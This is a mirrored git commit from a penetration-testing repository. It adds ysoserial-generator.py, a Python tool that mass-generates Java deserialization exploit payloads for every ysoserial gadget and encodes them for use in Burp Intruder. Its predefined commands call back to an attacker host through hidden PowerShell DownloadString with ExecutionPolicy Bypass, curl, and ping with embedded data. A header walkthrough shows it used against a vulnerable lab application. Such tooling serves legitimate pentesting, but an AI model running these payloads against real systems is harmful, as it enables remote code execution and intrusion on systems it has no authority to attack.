mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-21 18:11:37 +01:00
Updated submodules and added ysoserial-generator.py
This commit is contained in:
parent
55a66e85a6
commit
9abaa572f3
@ -1 +1 @@
|
||||
Subproject commit eb9621e5aa4cb563a7370a72ce8b41b6dd1c2c02
|
||||
Subproject commit 32992adea5369e661eea6fabbbc95b8284cc2959
|
@ -1 +1 @@
|
||||
Subproject commit 4fb3946a2f1d9ae7e444bccca6eea7e78b2c3480
|
||||
Subproject commit 80e7515ed6aff631b3449e654b67988b1f01baa4
|
@ -1 +1 @@
|
||||
Subproject commit 33e77f015eae07ae63d9b0464f135d594b4a558e
|
||||
Subproject commit 9c45287644d5cdc6f7b0433e09b12a6b7901ea97
|
@ -1 +1 @@
|
||||
Subproject commit 524ab119a4bb7f79fe8a74b500c14e9334f7c4a2
|
||||
Subproject commit f1fa7ef39ef4bb402b196e17e734eb852a7102e0
|
441
web/ysoserial-generator.py
Executable file
441
web/ysoserial-generator.py
Executable file
@ -0,0 +1,441 @@
|
||||
#!/usr/bin/python
|
||||
|
||||
#
|
||||
# This tool helps fuzzing applications that use Java serialization under the hood, by
|
||||
# automating `ysoserial` proof-of-concept tool for generating payloads that
|
||||
# exploit unsafe Java object deserialization.
|
||||
#
|
||||
# This tool generates every possible payload for every implemented gadget, thus
|
||||
# resulting in number of payload files (or one file with number of lines), being
|
||||
# URL/Base64 encoded along the way or not - which can be later used for manual
|
||||
# penetration testing assignments like pasting that file to BurpSuite intruder, or
|
||||
# enumerating every payload from within bash/python script.
|
||||
#
|
||||
# Example use case:
|
||||
# 1. Download, compile and launch example vulnerable application like:
|
||||
# https://github.com/hvqzao/java-deserialize-webapp
|
||||
#
|
||||
# 2. Start local HTTP server, for instance:
|
||||
# -----------------------------------------
|
||||
# $ python -m SimpleHTTPServer
|
||||
# Serving HTTP on 0.0.0.0 port 8000 ...
|
||||
# -----------------------------------------
|
||||
#
|
||||
# 3. Generate payloads to test against that application:
|
||||
# -----------------------------------------
|
||||
# $ ./mass-ysoserial.py -u -b -y ~/tools/ysoserial/ysoserial.jar -s --lhost 192.168.56.1:8000
|
||||
# :: ysoserial payloads generation helper
|
||||
# Helps generate many variations of payloads to try against vulnerable application.
|
||||
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
|
||||
# v0.1
|
||||
#
|
||||
# [+] Command within payload:
|
||||
# "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c ((New-Object Net.WebClient).DownloadString('http://192.168.56.1:8000/...'))"
|
||||
# [+] Command within payload:
|
||||
# "curl -k -s http://192.168.56.1:8000/..."
|
||||
# -----------------------------------------
|
||||
#
|
||||
# 4. Capture example POST request to that application from within Burp.
|
||||
#
|
||||
# 5. Now paste resulting file 'ysoserial-payloads.txt' into BurpSuite intruder's Simple list and hit "Start attack"
|
||||
#
|
||||
# 6. Watch your SimpleHTTPServer logs:
|
||||
# -----------------------------------------
|
||||
# $ python -m SimpleHTTPServer
|
||||
# Serving HTTP on 0.0.0.0 port 8000 ...
|
||||
# 192.168.56.128 - - [02/May/2018 01:20:58] code 404, message File not found
|
||||
# 192.168.56.128 - - [02/May/2018 01:20:58] "GET /CommonsCollections2-linux HTTP/1.1" 404 -
|
||||
# 192.168.56.128 - - [02/May/2018 01:20:58] code 404, message File not found
|
||||
# 192.168.56.128 - - [02/May/2018 01:20:58] "GET /CommonsCollections4-linux HTTP/1.1" 404 -
|
||||
# 192.168.56.128 - - [02/May/2018 01:20:58] code 404, message File not found
|
||||
# 192.168.56.128 - - [02/May/2018 01:20:58] "GET /Jdk7u21-linux HTTP/1.1" 404 -
|
||||
# -----------------------------------------
|
||||
#
|
||||
# 7. You've just found that gadgets: CommonsCollections2, CommonsCollections4 and Jdk7u21 have launched successfully against vulnerable web application.
|
||||
#
|
||||
#
|
||||
# Author:
|
||||
# Mariusz B., '18 / <mb@binary-offensive.com>
|
||||
#
|
||||
|
||||
import os
|
||||
import re
|
||||
import sys
|
||||
import base64
|
||||
import urllib
|
||||
import commands
|
||||
import argparse
|
||||
from sys import platform
|
||||
|
||||
VERSION = '0.1'
|
||||
|
||||
config = {
|
||||
'verbose' : True,
|
||||
'debug' : True,
|
||||
|
||||
'ysoserial-path' : '',
|
||||
'command' : '',
|
||||
|
||||
# Do not modify below ones
|
||||
'gadgets': [],
|
||||
'output': '',
|
||||
'lhost': '',
|
||||
'base64': False,
|
||||
'urlencode': False,
|
||||
'onefile': False,
|
||||
'predefined': False,
|
||||
'predefined-cmd': '',
|
||||
'platform' : '',
|
||||
'separate-by-semicolons': True,
|
||||
}
|
||||
|
||||
predefined = {
|
||||
'ping': {
|
||||
'windows' : 'ping -n 1 {host}',
|
||||
'linux' : 'ping -c 1 -p {data} {host}',
|
||||
},
|
||||
|
||||
'http': {
|
||||
'windows' : 'powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c ((New-Object Net.WebClient).DownloadString(\'{host}/{data}\'))',
|
||||
'linux' : 'curl -k -s {host}/{data}',
|
||||
}
|
||||
}
|
||||
|
||||
#
|
||||
# These gadgets await for non-standard arguments like:
|
||||
# host:port, write;destDir;ascii-data, localpath:remotepath and so on.
|
||||
#
|
||||
skipGadgets = (
|
||||
'Wicket1', 'FileUpload1', 'JRMPClient', 'JRMPListener', 'Jython1', 'Myfaces2',
|
||||
'URLDNS', 'C3P0'
|
||||
)
|
||||
|
||||
warnCmdOnce = False
|
||||
generated = 0
|
||||
firstLaunch = True
|
||||
|
||||
commandsSoFar = set()
|
||||
|
||||
class Logger:
|
||||
@staticmethod
|
||||
def _out(x):
|
||||
if config['debug'] or config['verbose']:
|
||||
sys.stdout.write(x + '\n')
|
||||
|
||||
@staticmethod
|
||||
def dbg(x):
|
||||
if config['debug']:
|
||||
sys.stdout.write('[dbg] ' + x + '\n')
|
||||
|
||||
@staticmethod
|
||||
def out(x):
|
||||
Logger._out('[.] ' + x)
|
||||
|
||||
@staticmethod
|
||||
def info(x):
|
||||
Logger._out('[?] ' + x)
|
||||
|
||||
@staticmethod
|
||||
def err(x):
|
||||
sys.stdout.write('[!] ' + x + '\n')
|
||||
|
||||
@staticmethod
|
||||
def fail(x):
|
||||
Logger._out('[-] ' + x)
|
||||
|
||||
@staticmethod
|
||||
def ok(x):
|
||||
Logger._out('[+] ' + x)
|
||||
|
||||
def getFileName(name, gadget):
|
||||
global firstLaunch
|
||||
|
||||
ext = 'bin'
|
||||
if config['base64'] or config['urlencode']:
|
||||
ext = 'txt'
|
||||
|
||||
if config['onefile']:
|
||||
if config['output'] and config['output'] != '-':
|
||||
return config['output']
|
||||
elif config['output'] == '-':
|
||||
return ''
|
||||
elif not config['output']:
|
||||
p = 'ysoserial-payloads.{ext}'.format(ext = ext)
|
||||
|
||||
if os.path.isfile(p) and firstLaunch:
|
||||
Logger.err('Output file ("{}") already exists: unable to continue.'.format(p))
|
||||
sys.exit(1)
|
||||
|
||||
firstLaunch = False
|
||||
return p
|
||||
else:
|
||||
path = ''
|
||||
out = 'ysoserial-{gadget}-{name}-payload.{ext}'.format(
|
||||
name=name, gadget=gadget, ext=ext
|
||||
)
|
||||
|
||||
if config['output'] != '-':
|
||||
path = config['output']
|
||||
return os.path.join(path, out)
|
||||
else:
|
||||
return out
|
||||
|
||||
def processCmd(cmd, name, gadget):
|
||||
global warnCmdOnce
|
||||
global commandsSoFar
|
||||
|
||||
cmd2 = cmd
|
||||
Logger.dbg('Command before processing:\n{}\n'.format(cmd))
|
||||
|
||||
data = '{gadget}-{name}'.format(
|
||||
gadget = gadget, name = name
|
||||
)
|
||||
|
||||
lhost = config['lhost']
|
||||
|
||||
if not warnCmdOnce:
|
||||
notWorking = ['|', '&', '<', '>', ';']
|
||||
for n in notWorking:
|
||||
if n in cmd:
|
||||
warnCmdOnce = True
|
||||
Logger.fail('WARNING: Your command contains character that will prevent your payload from running correctly: "{}". Remember shortcomings of Java\'s "Runtime.getRuntime().exec(...)" function: you cannot use apostrophes, quotes, pipes, ampersands and so on. One can refer to following article for more informations: https://bit.ly/2JLvdCv '.format(n))
|
||||
break
|
||||
|
||||
if 'data' in cmd:
|
||||
if config['predefined'] and config['predefined-cmd'] == 'ping':
|
||||
data = ''.join(['{:02x}'.format(ord(x)) for x in data[:16]])
|
||||
|
||||
if config['predefined'] and config['predefined-cmd'] == 'http':
|
||||
if not lhost.startswith('http'):
|
||||
lhost = 'http://' + lhost
|
||||
|
||||
cmd2 = cmd2.format(data = data, host = lhost)
|
||||
|
||||
elif 'host' in cmd:
|
||||
cmd2 = cmd2.format(host = lhost)
|
||||
|
||||
Logger.dbg('Command after processing:\n{}\n'.format(cmd2))
|
||||
|
||||
cmd3 = cmd2.replace(data, '...')
|
||||
if cmd3 not in commandsSoFar:
|
||||
sys.stderr.write('[+] Command within payload:\n\t"{}"\n'.format(cmd3))
|
||||
commandsSoFar.add(cmd3)
|
||||
|
||||
return cmd2
|
||||
|
||||
def generate(name, cmd):
|
||||
global generated
|
||||
|
||||
for gadget in config['gadgets']:
|
||||
if gadget in skipGadgets:
|
||||
Logger.dbg('Skipping gadget {}...'.format(gadget))
|
||||
continue
|
||||
|
||||
Logger.info('Generating ' + gadget + ' for "' + name + '"...')
|
||||
|
||||
filename = getFileName(name, gadget)
|
||||
|
||||
redir = ''
|
||||
if not config['debug']:
|
||||
redir = '2>NULL_STREAM'
|
||||
|
||||
cmd2 = processCmd(cmd, name, gadget)
|
||||
out = shell('java -jar {ysoserial} {gadget} "{command}" {redir}'.format(
|
||||
ysoserial = config['ysoserial-path'],
|
||||
gadget = gadget,
|
||||
command = cmd2,
|
||||
redir = redir
|
||||
), True)
|
||||
|
||||
if config['base64']:
|
||||
out = base64.b64encode(out)
|
||||
|
||||
if out != "":
|
||||
if config['urlencode']:
|
||||
out = urllib.quote_plus(out)
|
||||
|
||||
if out != "":
|
||||
if filename == '':
|
||||
print(out + '\n')
|
||||
else:
|
||||
mode = 'w'
|
||||
if config['onefile']:
|
||||
Logger.dbg('Appending payload to the file: "{}"'.format(filename))
|
||||
mode = 'a'
|
||||
else:
|
||||
Logger.ok('Writing payload to the file: "{}"'.format(filename))
|
||||
|
||||
open(filename, mode).write(out + '\n')
|
||||
generated += 1
|
||||
else:
|
||||
Logger.err('Failed generating payload {}-{} for cmd: "{}"'.format(
|
||||
gadget, name, cmd2
|
||||
))
|
||||
|
||||
def processShellCmd(cmd):
|
||||
replaces = {
|
||||
'NULL_STREAM' : {
|
||||
'windows': 'nul',
|
||||
'linux': '/dev/null'
|
||||
},
|
||||
'WHICH_COMMAND' : {
|
||||
'windows': 'where',
|
||||
'linux': 'which'
|
||||
},
|
||||
}
|
||||
|
||||
for k, v in replaces.items():
|
||||
if k in cmd:
|
||||
cmd = cmd.replace(k, v[config['platform']])
|
||||
|
||||
return cmd
|
||||
|
||||
def shell(cmd, noOut = False):
|
||||
cmd = processShellCmd(cmd)
|
||||
out = commands.getstatusoutput(cmd)[1]
|
||||
if not noOut:
|
||||
Logger.dbg('shell("{}") returned:\n"{}"'.format(cmd, out))
|
||||
else:
|
||||
Logger.dbg('shell("{}")\n'.format(cmd))
|
||||
return out
|
||||
|
||||
def tryToFindYsoserial():
|
||||
global config
|
||||
if config['ysoserial-path']:
|
||||
return True
|
||||
|
||||
out = shell('WHICH_COMMAND ysoserial.jar 2>NULL_STREAM')
|
||||
|
||||
if out and os.path.isfile(out):
|
||||
config['ysoserial-path'] = out
|
||||
elif os.path.isfile('ysoserial.jar'):
|
||||
config['ysoserial-path'] = 'ysoserial.jar'
|
||||
else:
|
||||
Logger.err('Could not find "ysoserial.jar" in neither PATH nor current directory.')
|
||||
Logger.err('Please specify where to find "ysoserial.jar" using "-y" option.')
|
||||
sys.exit(1)
|
||||
|
||||
return True
|
||||
|
||||
def collectGadgets():
|
||||
global config
|
||||
|
||||
out = shell('java -jar {} --help'.format(config['ysoserial-path']))
|
||||
rex = re.compile(r'^\s+(\w+)\s+@\w+.+', re.I|re.M)
|
||||
gadgets = rex.findall(out)
|
||||
Logger.info('Available gadgets ({}): {}\n'.format(len(gadgets), ", ".join(gadgets)))
|
||||
|
||||
config['gadgets'] = gadgets
|
||||
|
||||
if not gadgets:
|
||||
Logger.err('Could not interpret ysoserial.jar output and thus could not collect available gadgets!')
|
||||
sys.exit(1)
|
||||
|
||||
def parseOptions(argv):
|
||||
global config
|
||||
|
||||
print('''
|
||||
:: ysoserial payloads generation helper
|
||||
Helps generate many variations of payloads to try against vulnerable application.
|
||||
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
|
||||
v{}
|
||||
'''.format(VERSION))
|
||||
|
||||
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <attacker-host>')
|
||||
|
||||
parser.add_argument('-t', '--lhost', default='127.0.0.1', help = 'Specifies attacker\'s host IP or FQDN to connect back to within predefined payload\'s command (like ping, http). If you are about to use predefined "http" payload - remember to specify whether it is http or https. Default: http://127.0.0.1')
|
||||
|
||||
parser.add_argument('-C', '--predefined', metavar='CMD', default='', choices=predefined.keys(), help='(Default, http) Use one of the predefined OS-agnostic commands: {}'.format(', '.join(predefined.keys())))
|
||||
|
||||
parser.add_argument('-c', '--command', metavar='CMD', default='', help='Specifies custom command to include within serialized payloads. Remember shortcomings of Java\'s Runtime.getRuntime().exec(...) function: you cannot use apostrophes, quotes, pipes, ampersands and so on. You can use however semicolons (;) - having specified two commands (like: ifconfig ; uname -a) will result in generating TWO payloads. For other nuances, one can refer to following article for more informations: https://bit.ly/2JLvdCv')
|
||||
|
||||
parser.add_argument('-b', '--base64', action='store_true', help='Base64 encode every generated payload (default: False).')
|
||||
|
||||
parser.add_argument('-u', '--urlencode', action='store_true', help='URL encode every generated payload (default: False).')
|
||||
|
||||
parser.add_argument('-S', '--semicolons', action='store_false', default=True, help='If used "--command" option and used semicolons in it, specifies to not to separate that command to several ones by semicolons (default: True).')
|
||||
|
||||
parser.add_argument('-o', '--output', metavar='FILE|DIR', help='Specifies output filename, if --onefile was used or directory name otherwise. One can use "-" to output to the stdout (assuming --onefile was used).')
|
||||
|
||||
parser.add_argument('-s', '--onefile', action='store_true', help='Output every generated payload to the same file, starting from newline. Makes sense to use with base64 encoding option set (default: False).')
|
||||
|
||||
parser.add_argument('-y', '--ysoserial', metavar='PATH', default='', help='Specifies path to ysoserial.jar file to use. If left empty, will try the one from current directory (or PATH environment variable)')
|
||||
|
||||
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
|
||||
parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.')
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
config['verbose'] = args.verbose
|
||||
config['debug'] = args.debug
|
||||
config['onefile'] = args.onefile
|
||||
config['base64'] = args.base64
|
||||
config['urlencode'] = args.urlencode
|
||||
config['lhost'] = args.lhost
|
||||
config['separate-by-semicolons'] = args.semicolons
|
||||
|
||||
if platform == 'linux' or platform == 'linux2':
|
||||
config['platform'] = 'linux'
|
||||
elif platform == 'win32' or platform == 'win64':
|
||||
config['platform'] = 'windows'
|
||||
|
||||
Logger.dbg('Found platform: {}'.format(platform))
|
||||
|
||||
if args.command and args.predefined:
|
||||
Logger.err('Options "--predefined" and "--command" are mutually exclusive! Please specify only one of them.')
|
||||
sys.exit(1)
|
||||
|
||||
if not args.command:
|
||||
config['predefined'] = True
|
||||
if not args.predefined:
|
||||
config['predefined-cmd'] = 'http'
|
||||
else:
|
||||
config['predefined-cmd'] = args.predefined
|
||||
|
||||
if config['lhost'] == '127.0.0.1':
|
||||
Logger.fail('WARNING: You did not specify "--lhost" parameter to connect back to your attacker-host. Currently used value is 127.0.0.1\n')
|
||||
else:
|
||||
config['command'] = args.command
|
||||
|
||||
if args.output:
|
||||
config['output'] = args.output
|
||||
|
||||
if os.path.isfile(args.output):
|
||||
Logger.err('Output file already exists: unable to continue.')
|
||||
sys.exit(1)
|
||||
|
||||
if args.ysoserial:
|
||||
config['ysoserial-path'] = args.ysoserial
|
||||
else:
|
||||
tryToFindYsoserial()
|
||||
|
||||
return args
|
||||
|
||||
def main(argv):
|
||||
global config
|
||||
|
||||
opts = parseOptions(argv)
|
||||
if not opts:
|
||||
Logger.err('Options parsing failed.')
|
||||
return False
|
||||
|
||||
collectGadgets()
|
||||
|
||||
if config['command']:
|
||||
if ';' in config['command'] and config['separate-by-semicolons']:
|
||||
Logger.info('Separating input command by semicolons...')
|
||||
|
||||
num = 0
|
||||
for cmd in config['command'].split(';'):
|
||||
num += 1
|
||||
generate('custom-cmd{}'.format(num), cmd)
|
||||
else:
|
||||
generate('custom', config['command'])
|
||||
else:
|
||||
generate('windows', predefined[config['predefined-cmd']]['windows'])
|
||||
generate('linux', predefined[config['predefined-cmd']]['linux'])
|
||||
|
||||
Logger.info('Generated: {} payloads.'.format(generated))
|
||||
|
||||
if __name__ == '__main__':
|
||||
main(sys.argv)
|
Loading…
Reference in New Issue
Block a user